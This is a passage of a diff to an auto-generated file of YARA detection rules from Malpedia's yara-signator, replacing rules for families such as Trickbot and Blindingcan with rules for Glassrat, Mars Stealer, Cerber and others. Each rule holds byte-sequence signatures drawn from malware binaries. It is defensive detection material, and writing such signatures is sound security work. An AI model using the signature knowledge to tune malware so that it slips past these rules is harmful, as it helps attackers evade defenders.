+		$sequence_6 = { e8???????? 8b1d???????? 83c40c 68e8030000 ffd3 6a00 6a00 }
+		$sequence_7 = { 895dc8 895dd0 ff5064 3bc3 894508 7d5d }
+		$sequence_8 = { b8???????? e8???????? 83ec0c 8b412c 56 57 }
+		$sequence_9 = { 33d2 8d0cb6 f7f6 8d0c89 }
+
+	condition:
+		7 of them and filesize < 106496
+}
+rule MALPEDIA_Win_Glassrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2a3a2192-1985-5afb-a3c8-457f3f4c729c"
+		id = "e9bc70a4-a165-546a-8b42-f2a0c16e09f0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mariposa"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mariposa_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glassrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.glassrat_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "343ac33f57cd9cc9bfc1841bf1bd211734de245f417ee554220587a46ed4086f"
+		logic_hash = "fbe939a1762c88ca3785e6b1a0e31abcf86d2dba3555094a224ffc73c72353a2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129737,32 +129689,32 @@ rule MALPEDIA_Win_Mariposa_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 55 8bec 53 56 bb???????? 43 }
-		$sequence_1 = { ffd3 33c0 50 e8???????? 33c0 }
-		$sequence_2 = { 53 56 bb???????? 43 }
-		$sequence_3 = { 885c0cff e2f1 ba???????? 2bd6 8bdc 03da 4b }
-		$sequence_4 = { 8a1c0e 02d8 32dc fec0 885c0cff e2f1 }
-		$sequence_5 = { 8bdc 03da 4b 54 ffd3 33c0 }
-		$sequence_6 = { 885c0cff e2f1 ba???????? 2bd6 }
-		$sequence_7 = { 8a4301 8a6302 f6d0 02c4 d0f8 8a1c0e }
-		$sequence_8 = { 53 56 bb???????? 43 803b00 }
-		$sequence_9 = { 03da 4b 54 ffd3 33c0 }
+		$sequence_0 = { 32c0 5d 83c408 c21400 53 56 8d4524 }
+		$sequence_1 = { 895904 894108 89790c 8b4a04 e8???????? }
+		$sequence_2 = { 0f8598000000 bf02000000 ff15???????? 6a00 8b95c4feffff }
+		$sequence_3 = { 6860ea0000 ff15???????? 8d8c242c010000 c784243c020000ffffffff e8???????? 46 83fe05 }
+		$sequence_4 = { 8d5004 8945ec 8930 b941000000 33c0 8bfa }
+		$sequence_5 = { 8d9578feffff 53 53 6a02 }
+		$sequence_6 = { c7857cffffff44000000 c745a801010000 668975ac 895db8 895dbc }
+		$sequence_7 = { 8dbd85feffff 8945e0 8945e4 889d84feffff f3ab 66ab }
+		$sequence_8 = { 33ed 68905f0100 ff15???????? 6a00 }
+		$sequence_9 = { e8???????? 53 55 56 33c0 8bf1 89442410 }
 
 	condition:
-		7 of them and filesize < 311296
+		7 of them and filesize < 81920
 }
-rule MALPEDIA_Win_Mortis_Auto : FILE
+rule MALPEDIA_Win_Unidentified_113_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f1dc50d3-c8e9-5fa8-9af5-7aac8f083303"
+		id = "026f5486-b8e6-5386-ab78-8b52aa522545"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mortis"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mortis_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_113"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_113_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "0e2f339d3dda0007a7d364688897ee3fa718ccca078261699c7cc12487f6f0da"
+		logic_hash = "c4dbb7c789bd37f81bad9c32be7e0c5fc26b7a85c7d9e53aaac6f7a0dd9d408f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129776,32 +129728,32 @@ rule MALPEDIA_Win_Mortis_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6bcf38 030c95201f4400 f6412d01 7428 e8???????? c70016000000 e8???????? }
-		$sequence_1 = { 68???????? 51 50 51 ffb54cfdffff 8d4d98 e8???????? }
-		$sequence_2 = { 8d1476 c1e204 8d0476 57 03d7 8d0cc7 e8???????? }
-		$sequence_3 = { 8d8d40feffff 6a00 034804 33c0 394138 0f94c0 8d048502000000 }
-		$sequence_4 = { c645fc01 8d8da0fdffff 6a07 0f57c0 c785b0fdffff00000000 68???????? 0f1185a0fdffff }
-		$sequence_5 = { f20f591485d08c4300 660f5834c5e0944300 660f54c5 f20f5ce8 f20f58fa f20f10d8 f20f59c1 }
-		$sequence_6 = { 8b07 6a01 68???????? 51 50 51 ffb54cfdffff }
-		$sequence_7 = { c60000 c645fc04 8b8d3cfdffff 83f910 722f 8b9528fdffff 41 }
-		$sequence_8 = { 7544 ba???????? b9???????? e8???????? 8bf0 ff15???????? }
-		$sequence_9 = { 68???????? 0f1185e8fdffff c785fcfdffff00000000 e8???????? c645fc05 8d8d00feffff 6a0a }
+		$sequence_0 = { e8???????? 83c408 be08000000 e9???????? 83f904 0f82a2000000 807c19fe3e }
+		$sequence_1 = { ff742434 ff15???????? ff74243c ff15???????? 57 ff15???????? 8b8c2468030000 }
+		$sequence_2 = { e8???????? 83c40c 8b4c2410 83c502 83d100 894c2410 85c0 }
+		$sequence_3 = { ff74242c 55 57 e8???????? 55 8bf8 e8???????? }
+		$sequence_4 = { ffd6 ff742414 ffd6 8b8c247c040000 5e 33cc e8???????? }
+		$sequence_5 = { ff7630 e8???????? 6a38 6a00 56 e8???????? 8b4710 }
+		$sequence_6 = { ff15???????? 8bd8 899da0feffff 85db 0f84fc030000 0f1f440000 ff15???????? }
+		$sequence_7 = { e8???????? 89442424 83c408 8bc7 837c241c00 0f44d8 53 }
+		$sequence_8 = { c785acf3ffff00000000 0fb608 8bd1 c785b0f3ffff00000000 c785b4f3ffff00000080 83ea01 741d }
+		$sequence_9 = { ff7020 8d44242c 50 8b442434 50 8b4020 ffd0 }
 
 	condition:
-		7 of them and filesize < 577536
+		7 of them and filesize < 4707328
 }
-rule MALPEDIA_Win_Photofork_Auto : FILE
+rule MALPEDIA_Win_Dispcashbr_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "03f3231c-1475-52ed-bb16-632751ac4d12"
+		id = "55df9dfe-3a05-5311-b783-4a51e2e4694d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.photofork"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.photofork_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dispcashbr"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dispcashbr_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "709bae5e70c248514471207a86aa73bde84d2e17312283aa497e33ccd6cf6fc3"
+		logic_hash = "086284cd3c4f836fd2903e8ee5f20f6af858fd595f5b202fe80164aaffa860ae"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129815,32 +129767,32 @@ rule MALPEDIA_Win_Photofork_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4d85d2 7515 8d56fc 33c9 41b8fe6a7a69 e8???????? }
-		$sequence_1 = { 4156 4883ec60 49894ba8 4533e4 }
-		$sequence_2 = { 488b0d???????? 488981e0100000 eb12 ba01000000 }
-		$sequence_3 = { 4c894858 33d2 41b800800000 488bcf 41ffd1 33c0 4881c4a0000000 }
-		$sequence_4 = { 4c8d45c4 eb72 488b05???????? 4885c0 742c 488b8080010000 }
-		$sequence_5 = { 0f85b9010000 ff15???????? 83f87a 0f85aa010000 8b8424d0000000 }
-		$sequence_6 = { 5e 5d c3 498bdf 6690 80bbc001000030 }
-		$sequence_7 = { 4c8bc6 488d950c020000 e8???????? 488d5590 }
-		$sequence_8 = { 488bd0 488b05???????? 48899040060000 488d4dc0 ffd2 66837dc009 b840000000 }
-		$sequence_9 = { 72ea 4533c9 4c8d459c 488d54242c }
+		$sequence_0 = { e8???????? 83ec08 c7442408c8ffffff c7442404???????? }
+		$sequence_1 = { e8???????? e9???????? c70424f5ffffff e8???????? }
+		$sequence_2 = { c744240404000000 890424 e8???????? 83ec08 c7442408f2ffffff }
+		$sequence_3 = { c744240404000000 890424 e8???????? 83ec08 c7442408c9ffffff c7442404???????? a1???????? }
+		$sequence_4 = { c744240404000000 890424 e8???????? 83ec08 c7442408eaffffff c7442404???????? a1???????? }
+		$sequence_5 = { 890424 e8???????? 83ec08 c7442408c8ffffff }
+		$sequence_6 = { e8???????? 83ec08 c7442408c9ffffff c7442404???????? a1???????? 83c020 890424 }
+		$sequence_7 = { c744240404000000 890424 e8???????? 83ec08 c7442408fcffffff c7442404???????? }
+		$sequence_8 = { 83c020 8944240c c744240822000000 c744240401000000 c70424???????? e8???????? }
+		$sequence_9 = { 83ec04 c744240404000000 890424 e8???????? 83ec08 c7442408e6ffffff c7442404???????? }
 
 	condition:
-		7 of them and filesize < 99328
+		7 of them and filesize < 123904
 }
-rule MALPEDIA_Win_Fengine_Auto : FILE
+rule MALPEDIA_Win_Nabucur_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cef733ce-bf96-5266-a850-204ef84184a0"
+		id = "9022825e-08e1-5228-a8ab-7502f1d2e737"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fengine"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fengine_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nabucur_auto.yar#L1-L155"
 		license_url = "N/A"
-		logic_hash = "507e9d8622f7849f14197935caec762eb3952f2b4dfc87cf038f7351547ec88d"
+		logic_hash = "1073a8071d9c420307c019b8193b4c07d15bc5ab7630e60f5042626f0d12ed0f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129854,32 +129806,38 @@ rule MALPEDIA_Win_Fengine_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 85c0 0f84c5020000 68???????? 53 e8???????? }
-		$sequence_1 = { 57 ff32 ff15???????? f7d8 1bc0 5e }
-		$sequence_2 = { 57 8d8decefffff 51 50 8d85fcf7ffff 50 }
-		$sequence_3 = { 50 e8???????? 8d5590 83c40c 8d4a01 8d642400 }
-		$sequence_4 = { c705????????01000000 e8???????? 48 f7d8 }
-		$sequence_5 = { 833d????????00 53 57 8bda 8bf9 7511 }
-		$sequence_6 = { 8b3e 83c328 0fb74706 8955e0 894ddc 3945f8 0f8c5affffff }
-		$sequence_7 = { 8d85f0efffff 50 53 ff15???????? 85c0 }
-		$sequence_8 = { 7410 8b4c3012 03c8 8d4616 }
-		$sequence_9 = { 3b45e4 7740 8d45ec 50 8b45e8 51 }
+		$sequence_0 = { 48 894500 85c0 7fee }
+		$sequence_1 = { 48 8944241c 85c0 7fd1 }
+		$sequence_2 = { 48 83f801 89442418 0f8f15ffffff }
+		$sequence_3 = { 48 83e908 85c0 75f0 57 }
+		$sequence_4 = { 48 8906 8d442410 50 }
+		$sequence_5 = { 009eaa030000 0fb686aa030000 57 83f80a 0f876d010000 }
+		$sequence_6 = { 33ff 397c242c 7e61 8b6c242c 8b03 8d4c0001 81f900020000 }
+		$sequence_7 = { 48 89442414 85c0 0f8f68ffffff }
+		$sequence_8 = { 89728e 5f 5c ab }
+		$sequence_9 = { e9???????? ffd6 e9???????? 5e e9???????? 68ad009a0c }
+		$sequence_10 = { ba0eb4d3fc 83c604 eb0c 83f901 }
+		$sequence_11 = { 8bec 68???????? e8???????? 813d????????1d932600 }
+		$sequence_12 = { e022 0884df221d84c2 221b 84dd 223c84 }
+		$sequence_13 = { b4d6 98 db3e d35f9e c25a1a }
+		$sequence_14 = { af 6abb 8ed5 3155fc }
+		$sequence_15 = { 91 039109861780 60 96 }
 
 	condition:
-		7 of them and filesize < 210944
+		7 of them and filesize < 1949696
 }
-rule MALPEDIA_Win_Donot_Auto : FILE
+rule MALPEDIA_Win_Quirkyloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "30399a34-f31f-510d-a9cd-b28c8f061e17"
+		id = "96ed682d-1f85-55be-b220-303838180cde"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.donot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.donot_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quirkyloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.quirkyloader_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "b17b58b9afa5bf822376cb1f7c125d224a4976e4d102fc9c5fd48e6d7a73b698"
+		logic_hash = "8925860198d03a19b550d761a81339280161301cb85fe60c28e452df7f2a68e4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129893,32 +129851,32 @@ rule MALPEDIA_Win_Donot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c745fc00000000 8d8d98fdffff 6a00 c78598fdffff00000000 68???????? c785a8fdffff00000000 c785acfdffff0f000000 }
-		$sequence_1 = { 83e63f c1ff06 6bf638 8b04bd187b0410 807c302800 7d3c e8???????? }
-		$sequence_2 = { c785c0fdffff00000000 c785c4fdffff07000000 668985b0fdffff 83fa10 }
-		$sequence_3 = { 8d4904 8a80101c0410 8841fc 83ea01 75ec 47 83eb01 }
-		$sequence_4 = { c78584edffff00000000 c78588edffff0f000000 c68574edffff00 e8???????? 8d8de8edffff c645fc0f 8d5101 }
-		$sequence_5 = { 8d048502000000 0bc1 8bce 50 e8???????? 32c0 e9???????? }
-		$sequence_6 = { c645fc1a 50 e8???????? c645fc1b b8ffffff7f 8b55c8 2bc2 }
-		$sequence_7 = { 83ec18 c645fc06 8d85c8fdffff 8bcc 50 e8???????? 8d8580fdffff }
-		$sequence_8 = { 8d8598fdffff 0f438598fdffff 03f0 56 e8???????? 8b8590fdffff }
-		$sequence_9 = { 7269 81fbffffff3f 7349 8d041b 3dffffff7f 0f8741010000 }
+		$sequence_0 = { e8???????? 488bd8 488d15636d1200 488d4b10 41b880000000 e8???????? 488d4e10 }
+		$sequence_1 = { e8???????? 85c0 740e b801000000 4883c438 5b 5e }
+		$sequence_2 = { 4c8d8c2488000000 488bcb 4533c0 e8???????? 4c8bf8 4c8b6b40 4d85ff }
+		$sequence_3 = { e8???????? 498bcd e8???????? 488d0d0a1a0300 e8???????? 488bd8 e8???????? }
+		$sequence_4 = { 8b7a04 49033f 4803f9 4803fb 483bdf 731f 488b0b }
+		$sequence_5 = { ffc8 488d1480 498b4230 488d0cd0 488b4110 49894110 49c741f801000000 }
+		$sequence_6 = { 80b9b901000000 7502 eb15 488bce e8???????? 488bc8 33d2 }
+		$sequence_7 = { eb02 8bc6 8945cc 488b4518 488b4818 48898d70ffffff 488b4518 }
+		$sequence_8 = { f7da 41b9ff000000 83e207 0fb6ca 488d95c0000000 62d17e486f00 62f17e487f4502 }
+		$sequence_9 = { e8???????? 488bc3 8138ffffff7f 7409 488bc3 8b00 ffc0 }
 
 	condition:
-		7 of them and filesize < 626688
+		7 of them and filesize < 4722688
 }
-rule MALPEDIA_Win_Blindingcan_Auto : FILE
+rule MALPEDIA_Win_Mars_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "acf0a9ea-8e05-5582-9c4c-05db475e1e05"
+		id = "5d89ff0c-708d-5cb2-bdc2-6969544672dc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blindingcan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blindingcan_auto.yar#L1-L169"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mars_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mars_stealer_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "106ff295c55cb42cf4cd73966a6c4c30703711b6e069188fdbe10ead59c40c1a"
+		logic_hash = "cc94c9b32aabf5299f34d05641ffdf1640d29fa168f4cb92b657b3f5122a585c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129932,40 +129890,34 @@ rule MALPEDIA_Win_Blindingcan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c745cc2932779f 66c745d0e35b c745d45df0da89 c745d87b772e76 c745dc62a9f6c4 c745e0d29c1f7b }
-		$sequence_1 = { a1???????? 33c5 8945fc 56 57 8d85f8f7ffff }
-		$sequence_2 = { 750a 8b30 89b495fcfeffff 42 83c00c 49 }
-		$sequence_3 = { c7857cfeffff36a54e6b c78580feffff5c01611e c78584feffffb5dcfc68 c78588feffff6ce7a33a c7858cfeffffafe2e55a c78590feffff74c31dff c78594feffff657f9183 }
-		$sequence_4 = { c78514fdffff7532479f c78518fdffffe35bc9c0 c7851cfdfffffc9c461f c78520fdffff9821ddfa c78524fdffff589a8f7a }
-		$sequence_5 = { c78554feffffa14b0c27 c78558feffff10c0aac6 c7855cfeffff489a8471 c78560feffff9cab4ad6 c78564feffff67cf2900 c78568feffff02dbaeb5 }
-		$sequence_6 = { 83c40c 85f6 741f 68???????? 68???????? 6a00 }
-		$sequence_7 = { c78504fdfffff79d6681 c78508fdffffbfa7f8a5 c7850cfdffffa0118db8 c78510fdffff4d3feb78 }
-		$sequence_8 = { 8bca e8???????? 85c0 7409 e8???????? }
-		$sequence_9 = { 99 f7fe 8bca e8???????? }
-		$sequence_10 = { b990190000 66394802 7574 488b35???????? 33d2 }
-		$sequence_11 = { 488bd3 ff15???????? 4c21642438 4c21642430 895c2428 83cbff }
-		$sequence_12 = { 4c8bc9 753b 0fb789a8040000 b8bb010000 ba00010000 }
-		$sequence_13 = { 488d4dd0 ff15???????? 488d55b8 488d4dd0 ff15???????? f20f102d???????? }
-		$sequence_14 = { 4533848410cb0100 4533451c 418bc0 c1e810 }
-		$sequence_15 = { 488bf8 483bc3 7423 448d4e81 448d4684 488d542440 }
+		$sequence_0 = { 83c404 8945fc 837dfc00 744c 6a00 }
+		$sequence_1 = { e8???????? 83c404 85c0 7443 833d????????00 751e }
+		$sequence_2 = { 0f90c1 f7d9 0bc8 51 ff15???????? 83c404 8945f4 }
+		$sequence_3 = { 8985fcfdffff c745fcc0270900 6a04 8d45fc 50 6a02 }
+		$sequence_4 = { 51 e8???????? c78548fcffff94000000 8d9548fcffff }
+		$sequence_5 = { 8bec 81ecc8040000 56 57 c78548fcffff00000000 6890000000 6a00 }
+		$sequence_6 = { 8d85e8d7ffff 50 e8???????? 6888130000 8d8d78ecffff }
+		$sequence_7 = { 8b55f0 52 ff15???????? 83c404 8b45e8 }
+		$sequence_8 = { 8d8d78ecffff 51 e8???????? 8d95e4d7ffff 52 8d85e0d7ffff 50 }
+		$sequence_9 = { 50 ff15???????? 83c404 8985dcf7ffff 8b85dcf7ffff }
 
 	condition:
-		7 of them and filesize < 363520
+		7 of them and filesize < 219136
 }
-rule MALPEDIA_Win_Trickbot_Auto : FILE
+rule MALPEDIA_Win_Unidentified_116_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7dec44a5-ed16-520b-98af-bb6c41308144"
+		id = "e8b2ca1f-b6d4-5e1a-8d04-484724c2f148"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.trickbot_auto.yar#L1-L647"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_116"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_116_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "2410d16d7ee16128151b288938666126105e8a07f0144c47c922a04a3e6d63dc"
+		logic_hash = "aa3fe5ce882f091eaea8e0baeea989ea94aa46089f7c3aca2e5f5e4ccdc04bad"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -129977,100 +129929,32 @@ rule MALPEDIA_Win_Trickbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 1bc0 83e020 83c020 eb36 }
-		$sequence_1 = { 83c010 eb25 a900000040 7411 2500000080 f7d8 1bc0 }
-		$sequence_2 = { eb36 2500000080 f7d8 1bc0 83e070 83c010 eb25 }
-		$sequence_3 = { f7d8 1bc0 83e002 83c002 eb0d 2500000080 f7d8 }
-		$sequence_4 = { 8b07 a900000020 7429 a900000040 }
-		$sequence_5 = { c705????????fdffffff c705????????feffffff c705????????ffffffff e8???????? }
-		$sequence_6 = { 895df8 895df4 895dec 66c745f00005 895dfc }
-		$sequence_7 = { 8902 3bcb 7507 5f 5e }
-		$sequence_8 = { 8d1489 8d0cd0 8b4114 2b410c }
-		$sequence_9 = { 41 83c028 3bce 7ce9 }
-		$sequence_10 = { 1bc0 83e007 40 8b4fe8 }
-		$sequence_11 = { 488b5118 4889442440 488b4148 4889442438 }
-		$sequence_12 = { 488b4138 4889442428 488b4130 488b4910 4889442420 41ffd2 }
-		$sequence_13 = { 4c8b4120 488b5118 4889442438 488b4140 }
-		$sequence_14 = { 488b01 4c8b4120 488b5118 488b4910 }
-		$sequence_15 = { 488b01 488b5118 488b4910 ffd0 }
-		$sequence_16 = { 488b4148 4c8b11 4c8b4928 4c8b4120 488b5118 }
-		$sequence_17 = { 488b4148 4889442438 488b4140 4889442430 488b4138 4889442428 488b4130 }
-		$sequence_18 = { 48397c2430 0f94c3 8bc3 488b5c2450 4883c440 }
-		$sequence_19 = { 6644891b 664183fb1a 7307 664183c341 eb13 }
-		$sequence_20 = { 83780400 7404 8b4008 c3 }
-		$sequence_21 = { 2bc2 d1e8 03c2 c1e806 6bc05f }
-		$sequence_22 = { 6820bf0200 68905f0100 68905f0100 50 }
-		$sequence_23 = { 51 68e9fd0000 50 e8???????? }
-		$sequence_24 = { 6a40 6800300000 6a70 6a00 }
-		$sequence_25 = { 8d440002 6a00 50 e8???????? }
-		$sequence_26 = { c3 6a01 ff15???????? 50 }
-		$sequence_27 = { 85c0 7f0b e8???????? 8b05???????? }
-		$sequence_28 = { e8???????? 83f801 7411 ba0a000000 }
-		$sequence_29 = { 8b45f8 5f c60000 2b450c 5e }
-		$sequence_30 = { 8b01 59 03d0 52 ebdc 89450c }
-		$sequence_31 = { 8bc1 66ad 85c0 741c }
-		$sequence_32 = { 50 8b450c ff4d0c ba28000000 f7e2 }
-		$sequence_33 = { 7405 e8???????? ff15???????? 8bc3 }
-		$sequence_34 = { ff5508 8b5510 8b4a04 ff5508 50 51 }
-		$sequence_35 = { 2bc1 8b00 3bc7 72f2 }
-		$sequence_36 = { ff5508 58 894514 8b5510 }
-		$sequence_37 = { 03d0 895510 8b4a04 ff5508 8b5510 8b4a0c }
-		$sequence_38 = { c1e102 2bc1 8b00 894508 }
-		$sequence_39 = { 85c0 741c 3bc1 7213 }
-		$sequence_40 = { 3bc1 7703 894df4 8b47fc }
-		$sequence_41 = { 0f8280000000 813950450000 7578 f6411602 7472 }
-		$sequence_42 = { f7e2 8d9500040000 03d0 895510 }
-		$sequence_43 = { c744242000300000 ff15???????? 85c0 7911 }
-		$sequence_44 = { 790f 8bc8 e8???????? 8d5e10 }
-		$sequence_45 = { 8bcf e8???????? 8bf0 85ed }
-		$sequence_46 = { 7911 8bc8 e8???????? bb10000000 }
-		$sequence_47 = { 33c9 33d2 ff15???????? 85c0 }
-		$sequence_48 = { 7c22 3c39 7f1e 0fbec0 }
-		$sequence_49 = { 7536 b906000000 8bc1 c3 }
-		$sequence_50 = { 58 41 41 41 41 }
-		$sequence_51 = { 8bcd 84c0 742e 660f1f440000 3c30 7c22 }
-		$sequence_52 = { ff15???????? 8bf0 c1ee1f 83f601 }
-		$sequence_53 = { ff15???????? 85c0 0f89d2000000 8bc8 e8???????? }
-		$sequence_54 = { eb0a 83f802 742b 83f803 745b }
-		$sequence_55 = { 8bc8 33c0 85c9 0f95c0 eb02 }
-		$sequence_56 = { 41 41 50 2bc1 8b00 }
-		$sequence_57 = { 2bc1 c1e002 51 8bcf }
-		$sequence_58 = { 6a00 6a00 ff15???????? 6a00 6a00 6a00 8d45dc }
-		$sequence_59 = { 8b7d10 2bf9 53 50 }
-		$sequence_60 = { 8dbf00500310 8bd6 897d08 3bc8 }
-		$sequence_61 = { 8b4d08 dd01 8b7510 dd1e e9???????? c745dce8c20001 }
-		$sequence_62 = { 3302 52 8bd0 51 03cf 51 58 }
-		$sequence_63 = { 58 8910 59 5a }
-		$sequence_64 = { 760b 8b45d0 83e801 8945d0 }
-		$sequence_65 = { 8945d4 8b4dfc 51 8b55d4 52 e8???????? 8b45fc }
-		$sequence_66 = { 85c0 7417 817de013010000 7502 eb0c 8d45dc 50 }
-		$sequence_67 = { bad64abad6 4a ba5d12f75d 12f7 5d 12f7 5d }
-		$sequence_68 = { c705????????ad380001 8935???????? a3???????? ff15???????? a3???????? 83f8ff 0f84c1000000 }
-		$sequence_69 = { 51 6800300400 8b55f8 52 ff15???????? 8945fc 837dfc00 }
-		$sequence_70 = { 40 8945d0 ff75fc ff75d0 }
-		$sequence_71 = { 84c0 741d 56 68???????? 8bc7 e8???????? }
-		$sequence_72 = { 8b4508 56 8d34c590f30001 833e00 7513 }
-		$sequence_73 = { f361 34aa 61 34aa }
-		$sequence_74 = { c1e803 85c0 7414 56 57 }
-		$sequence_75 = { 56 ff750c 6818280300 5e 56 }
-		$sequence_76 = { 83c408 eb18 81ff01030000 7d10 53 53 }
-		$sequence_77 = { 7420 8b4de0 83c101 894de0 817de014010000 }
+		$sequence_0 = { 48 8d0d628bfaff ff15???????? 48 8d05158bfaff 83fe01 48 }
+		$sequence_1 = { e8???????? 48 89442428 4c 8d05a724fcff 4c }
+		$sequence_2 = { ff15???????? 83f8ff 7508 ff15???????? 8bd8 4c 8b8608010000 }
+		$sequence_3 = { 8bd9 48 8901 f6c201 740a ba38000000 e8???????? }
+		$sequence_4 = { 8b7c2460 49 63e8 48 03ea 44 8b3f }
+		$sequence_5 = { 8bc0 c1e010 c1e910 0bc8 41 c1e810 0fb6432f }
+		$sequence_6 = { eb44 48 8b4c2420 e8???????? 48 8bf8 48 }
+		$sequence_7 = { f20f59d3 48 03c2 48 ba00803ed5 deb19d014803 c28944 }
+		$sequence_8 = { 41 5e c3 48 896c2430 48 897c2440 }
+		$sequence_9 = { 8bf9 0f84be000000 48 895c2430 48 89742438 48 }
 
 	condition:
-		7 of them and filesize < 712704
+		7 of them and filesize < 1040384
 }
-rule MALPEDIA_Win_Ghost_Secret_Auto : FILE
+rule MALPEDIA_Win_Cerber_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "25fa3485-ffb3-5411-9ac6-ae7f05225e3c"
+		id = "4c9d39f2-1f37-54c9-9401-1cacb9319069"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_secret"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ghost_secret_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cerber_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "80ab2d045d82b27f499fbd18dbe91dc4f32ae725e1e1075459fc83c90e8a3488"
+		logic_hash = "b9dc28e7f8f56d5aa5c92d6f0da2514b7004d6b05c357e6e1f8548cb64132bf7"
 		score = 75
 		quality = 75
 		tags = "FILE"
